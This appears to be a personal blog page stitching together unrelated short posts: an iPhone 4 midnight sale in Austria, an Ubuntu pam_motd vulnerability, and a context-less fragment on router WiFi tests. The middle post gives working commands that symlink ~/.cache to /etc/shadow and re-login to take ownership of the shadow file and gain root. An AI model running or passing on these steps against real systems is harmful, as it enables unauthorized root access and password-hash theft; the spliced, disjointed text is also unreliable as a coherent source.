iPhone 4 – Midnight Sale

In Austria the iPhone 4 will be launched tomorrow Friday the 30th. At T-Mobile Austria there will be a midnight sale and I am going to be in queue this evening. PAM Vulnerability – Ubuntu

The pam_motd (Message of The Day) module in Ubuntu 9.10 and 10.4 LTS allows one to take the /etc/shadow file over and get root on the system by following a few simple steps:

rm -rf ~/.cache

ln -s /etc/shadow ~/.cache

ssh localhost (trigger pam_motd by re-logging in and you’ll own /etc/shadow)

Easy eh? A security patch for this is already available. See this link.

I tested the GigE wired connection and both the WiFi G and N standard from a MacBook Pro, which comes with WiFi N support and a GigE card by default. The stock firmware on the router was actually replaced by a dd-wrt v24-sp2 firmware.
